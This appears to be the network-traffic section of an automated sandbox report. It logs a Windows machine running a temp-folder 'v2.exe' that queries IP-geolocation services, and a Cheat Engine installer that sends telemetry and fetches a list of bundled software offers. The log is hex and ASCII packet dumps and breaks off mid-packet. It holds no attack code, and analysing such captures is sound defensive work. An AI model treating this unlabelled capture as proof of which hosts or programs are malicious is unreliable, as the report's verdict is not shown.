Dec 28, 2024 22:20:09.303551912 CET	1.1.1.1	192.168.2.5	0xf9c5	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:11.753463030 CET	1.1.1.1	192.168.2.5	0xa482	No error (0)	d31tu1fsc224h4.cloudfront.net		13.226.4.166	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:11.753463030 CET	1.1.1.1	192.168.2.5	0xa482	No error (0)	d31tu1fsc224h4.cloudfront.net		13.226.4.44	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:11.753463030 CET	1.1.1.1	192.168.2.5	0xa482	No error (0)	d31tu1fsc224h4.cloudfront.net		13.226.4.196	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:11.753463030 CET	1.1.1.1	192.168.2.5	0xa482	No error (0)	d31tu1fsc224h4.cloudfront.net		13.226.4.2	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:15.171505928 CET	1.1.1.1	192.168.2.5	0x5f3	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:15.171505928 CET	1.1.1.1	192.168.2.5	0x5f3	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:12.500791073 CET	1.1.1.1	192.168.2.5	0x94f6	No error (0)	d34hwk9wxgk5fi.cloudfront.net		65.9.108.93	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:12.500791073 CET	1.1.1.1	192.168.2.5	0x94f6	No error (0)	d34hwk9wxgk5fi.cloudfront.net		65.9.108.148	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:12.500791073 CET	1.1.1.1	192.168.2.5	0x94f6	No error (0)	d34hwk9wxgk5fi.cloudfront.net		65.9.108.5	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:12.500791073 CET	1.1.1.1	192.168.2.5	0x94f6	No error (0)	d34hwk9wxgk5fi.cloudfront.net		65.9.108.87	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:29.320075989 CET	1.1.1.1	192.168.2.5	0x4f5	No error (0)	shield.reasonsecurity.com	d14mh4uvqj4iiz.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 28, 2024 22:21:29.320075989 CET	1.1.1.1	192.168.2.5	0x4f5	No error (0)	d14mh4uvqj4iiz.cloudfront.net		18.66.161.123	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:29.320075989 CET	1.1.1.1	192.168.2.5	0x4f5	No error (0)	d14mh4uvqj4iiz.cloudfront.net		18.66.161.62	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:29.320075989 CET	1.1.1.1	192.168.2.5	0x4f5	No error (0)	d14mh4uvqj4iiz.cloudfront.net		18.66.161.59	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:29.320075989 CET	1.1.1.1	192.168.2.5	0x4f5	No error (0)	d14mh4uvqj4iiz.cloudfront.net		18.66.161.71	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:37.819847107 CET	1.1.1.1	192.168.2.5	0x77f5	No error (0)	d31tu1fsc224h4.cloudfront.net		3.165.135.3	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:37.819847107 CET	1.1.1.1	192.168.2.5	0x77f5	No error (0)	d31tu1fsc224h4.cloudfront.net		3.165.135.186	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:37.819847107 CET	1.1.1.1	192.168.2.5	0x77f5	No error (0)	d31tu1fsc224h4.cloudfront.net		3.165.135.48	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:37.819847107 CET	1.1.1.1	192.168.2.5	0x77f5	No error (0)	d31tu1fsc224h4.cloudfront.net		3.165.135.185	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:06.561644077 CET	1.1.1.1	192.168.2.5	0x777c	No error (0)	electron-shell.reasonsecurity.com	d2axwe94icddzf.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 28, 2024 22:22:06.561644077 CET	1.1.1.1	192.168.2.5	0x777c	No error (0)	d2axwe94icddzf.cloudfront.net		18.66.161.99	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:06.561644077 CET	1.1.1.1	192.168.2.5	0x777c	No error (0)	d2axwe94icddzf.cloudfront.net		18.66.161.106	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:06.561644077 CET	1.1.1.1	192.168.2.5	0x777c	No error (0)	d2axwe94icddzf.cloudfront.net		18.66.161.37	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:06.561644077 CET	1.1.1.1	192.168.2.5	0x777c	No error (0)	d2axwe94icddzf.cloudfront.net		18.66.161.60	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:14.873739958 CET	1.1.1.1	192.168.2.5	0x7394	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:16.822206974 CET	1.1.1.1	192.168.2.5	0x50a9	No error (0)	api.openweathermap.org	eu-api.openweathermap.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 28, 2024 22:22:16.822206974 CET	1.1.1.1	192.168.2.5	0x50a9	No error (0)	eu-api.openweathermap.org		57.129.2.123	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:23.891159058 CET	1.1.1.1	192.168.2.5	0x410a	No error (0)	cheatengine.org		104.20.94.94	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:23.891159058 CET	1.1.1.1	192.168.2.5	0x410a	No error (0)	cheatengine.org		104.20.95.94	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:23.891159058 CET	1.1.1.1	192.168.2.5	0x410a	No error (0)	cheatengine.org		172.67.35.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

freegeoip.app

ipbase.com

d34hwk9wxgk5fi.cloudfront.net

d31tu1fsc224h4.cloudfront.net

shield.reasonsecurity.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	208.95.112.1	80	5316	C:\Users\user\AppData\Local\Temp\v2.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:09.442434072 CET	78	OUT	GET /json/?fields=61439 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 28, 2024 22:20:10.648534060 CET	483	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:09 GMT Content-Type: application/json; charset=utf-8 Content-Length: 306 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	208.95.112.1	80	5316	C:\Users\user\AppData\Local\Temp\v2.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:11.507074118 CET	78	OUT	GET /json/?fields=61439 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 28, 2024 22:20:12.742219925 CET	483	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:11 GMT Content-Type: application/json; charset=utf-8 Content-Length: 306 Access-Control-Allow-Origin: * X-Ttl: 57 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	49994	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:22:15.013387918 CET	272	OUT	GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Host: ip-api.com Connection: Keep-Alive
Dec 28, 2024 22:22:16.156825066 CET	483	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:22:15 GMT Content-Type: application/json; charset=utf-8 Content-Length: 306 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.67.160.84	443	5316	C:\Users\user\AppData\Local\Temp\v2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:04 UTC	67	OUT	GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
2024-12-28 21:20:05 UTC	850	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 28 Dec 2024 21:20:04 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Sat, 28 Dec 2024 22:20:04 GMT Location: https://ipbase.com/xml/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZRmIr2zS6G9L6uXZ9z9rPmMBDr70pxEa55xn599YNEkgRIYJGQmqogEp%2BMCCAuNZwkkc%2FWbCkBja5H40QhR7B8DP4uMg8bt5eKkr2vd0nQ6TzykBWpMIeF9ktQXFgC2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94979efdf842ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1724&rtt_var=809&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=681&delivery_rate=1693735&cwnd=183&unsent_bytes=0&cid=1d08db9746382969&ts=454&x=0"
2024-12-28 21:20:05 UTC	167	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.85.189	443	5316	C:\Users\user\AppData\Local\Temp\v2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:06 UTC	64	OUT	GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
2024-12-28 21:20:06 UTC	957	IN	HTTP/1.1 404 Not Found Date: Sat, 28 Dec 2024 21:20:06 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Age: 110082 Cache-Control: public,max-age=0,must-revalidate Cache-Status: "Netlify Edge"; hit Vary: Accept-Encoding X-Nf-Request-Id: 01JG7J81N4E6X2E12RP7G7B6GS cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7r0NPIuGsZ62nCmG%2B9T6%2BEJa%2Bvziov%2BnTwYxkAtEToRUQ4abL8%2BF8KwkL4G5621G0oN5enLCnKWm6e37Jg9og3KBJlnmk%2Fv6dSR5evPgEtTsJCxYDl%2BNNqdsbPm4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497aa783b334e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1818&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=678&delivery_rate=1553191&cwnd=173&unsent_bytes=0&cid=7087dacb525097ba&ts=478&x=0"
2024-12-28 21:20:06 UTC	412	IN	Data Raw: 64 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 20 32 20 31 32 38 20 31 32 35 Data Ascii: d79<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Page not found</title> <style> :root { --colorRgbFacetsTeal600: 2 128 125
2024-12-28 21:20:06 UTC	1369	IN	Data Raw: 61 6c 4c 69 67 68 74 32 30 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 3a 20 35 33 20 35 38 20 36 32 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 54 65 78 74 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 65 66 66 Data Ascii: alLight200); --colorRgbFacetsNeutralLight700: 53 58 62; --colorGrayDarkest: var(--colorRgbFacetsNeutralLight700); --colorGrayLighter: var(--colorRgbFacetsNeutralLight200); --colorText: var(--colorGrayDarkest); --eff
2024-12-28 21:20:06 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 76 61 72 28 2d 2d 65 66 66 65 63 74 53 68 61 64 6f 77 4c 69 67 68 74 53 68 61 6c 6c 6f 77 29 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 29 29 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 Data Ascii: padding: 24px; background: white; border-radius: 8px; box-shadow: var(--effectShadowLightShallow); border: 1px solid rgb(var(--colorGrayLighter)); } a { margin: 0; font-weight: 600;
2024-12-28 21:20:06 UTC	306	IN	Data Raw: 70 73 3a 2f 2f 61 6e 73 77 65 72 73 2e 6e 65 74 6c 69 66 79 2e 63 6f 6d 2f 74 2f 73 75 70 70 6f 72 74 2d 67 75 69 64 65 2d 69 2d 76 65 2d 64 65 70 6c 6f 79 65 64 2d 6d 79 2d 73 69 74 65 2d 62 75 74 2d 69 2d 73 74 69 6c 6c 2d 73 65 65 2d 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 2f 31 32 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e e2 80 9c 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 9d 20 73 75 70 70 6f 72 74 20 67 75 69 64 65 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 74 69 70 73 2e 0a 20 20 20 20 20 20 Data Ascii: ps://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking" >page not found support guide</a > for troubleshooting tips.
2024-12-28 21:20:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:09 UTC	233	OUT	POST /o HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 125 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:09 UTC	125	OUT	Data Raw: 7b 22 70 72 76 22 3a 20 22 30 2e 31 22 2c 22 70 6c 76 22 3a 20 22 32 2e 34 30 2e 30 2e 39 31 30 35 22 2c 22 6c 22 3a 20 22 65 6e 22 2c 22 61 22 3a 20 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 69 22 3a 20 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 73 22 3a 20 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 6f 22 3a 20 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 22 7d Data Ascii: {"prv": "0.1","plv": "2.40.0.9105","l": "en","a": "cheatengine","i": "cheatengine","s": "cheatengine","o": "10.0.19045.2006"}
2024-12-28 21:20:10 UTC	489	IN	HTTP/1.1 200 OK Content-Type: application/json Content-Length: 15463 Connection: close Server: awselb/2.0 Date: Sat, 28 Dec 2024 21:20:10 GMT cache-control: no-cache x-true-request-id: d1a16146-1956-4b6c-b879-45f0dc8d648a x-robots-tag: none expires: Thu, 01 Jan 1970 00:00:00 GMT X-Cache: Miss from cloudfront Via: 1.1 e93c671d969240be8a6839ba09d3b732.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: NsgYQ3uSKUaOmKluQCOvWSrCum8lswtvFKw6_hUYrA9dczSi8yMk_g==
2024-12-28 21:20:10 UTC	7895	IN	Data Raw: 7b 22 76 22 3a 22 30 2e 31 22 2c 22 6c 22 3a 22 55 53 22 2c 22 69 22 3a 7b 22 63 75 22 3a 22 22 2c 22 63 74 22 3a 22 22 2c 22 63 70 22 3a 22 22 2c 22 63 74 75 22 3a 22 22 2c 22 63 6c 22 3a 22 22 2c 22 63 68 22 3a 22 22 2c 22 63 61 22 3a 22 76 35 2e 38 33 22 2c 22 63 66 22 3a 22 22 2c 22 63 70 69 22 3a 22 22 2c 22 63 70 73 22 3a 22 22 2c 22 63 64 22 3a 22 22 2c 22 63 70 72 22 3a 22 22 2c 22 63 70 70 22 3a 22 22 2c 22 63 66 6c 22 3a 22 22 2c 22 63 6a 22 3a 22 2b 31 22 2c 22 63 62 22 3a 22 22 2c 22 63 6f 64 22 3a 22 22 2c 22 63 74 70 22 3a 22 22 2c 22 63 65 70 22 3a 22 22 7d 2c 22 66 22 3a 7b 22 6d 22 3a 33 2c 22 78 22 3a 22 32 30 32 35 2d 30 39 2d 32 32 54 32 31 3a 32 30 3a 31 30 2e 34 32 33 5a 22 2c 22 61 22 3a 22 63 64 63 32 22 2c 22 64 22 3a 22 31 32 32 Data Ascii: {"v":"0.1","l":"US","i":{"cu":"","ct":"","cp":"","ctu":"","cl":"","ch":"","ca":"v5.83","cf":"","cpi":"","cps":"","cd":"","cpr":"","cpp":"","cfl":"","cj":"+1","cb":"","cod":"","ctp":"","cep":""},"f":{"m":3,"x":"2025-09-22T21:20:10.423Z","a":"cdc2","d":"122
2024-12-28 21:20:10 UTC	7568	IN	Data Raw: 53 53 4f 52 5f 41 52 43 48 49 54 45 43 54 55 52 45 5c 5c 41 52 4d 36 34 22 5d 2c 22 63 70 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 63 61 66 65 65 2e 63 6f 6d 2f 63 6f 6e 73 75 6d 65 72 2f 65 6e 2d 75 73 2f 70 6f 6c 69 63 79 2f 67 6c 6f 62 61 6c 2f 6c 65 67 61 6c 2e 68 74 6d 6c 22 2c 22 63 74 75 22 3a 22 68 74 74 70 73 3a 2f 2f 68 6f 6d 65 2e 6d 63 61 66 65 65 2e 63 6f 6d 2f 52 6f 6f 74 2f 41 62 6f 75 74 55 73 2e 61 73 70 78 3f 69 64 3d 65 75 6c 61 22 2c 22 70 76 22 3a 22 31 2e 32 36 22 2c 22 6f 76 22 3a 36 33 2c 22 75 64 22 3a 74 72 75 65 2c 22 76 22 3a 34 7d 7d 2c 7b 22 61 64 22 3a 7b 22 6e 22 3a 22 22 2c 22 66 22 3a 22 5a 42 5f 43 43 6c 65 61 6e 65 72 5f 57 68 69 74 65 22 2c 22 6f 22 3a 22 43 43 6c 65 61 6e 65 72 22 7d 2c 22 70 73 22 3a 7b 22 69 Data Ascii: SSOR_ARCHITECTURE\\ARM64"],"cp":"https://www.mcafee.com/consumer/en-us/policy/global/legal.html","ctu":"https://home.mcafee.com/Root/AboutUs.aspx?id=eula","pv":"1.26","ov":63,"ud":true,"v":4}},{"ad":{"n":"","f":"ZB_CCleaner_White","o":"CCleaner"},"ps":{"i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	13.226.4.166	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:13 UTC	323	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json; Charset=UTF-8 Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 390 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:20:13 UTC	390	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 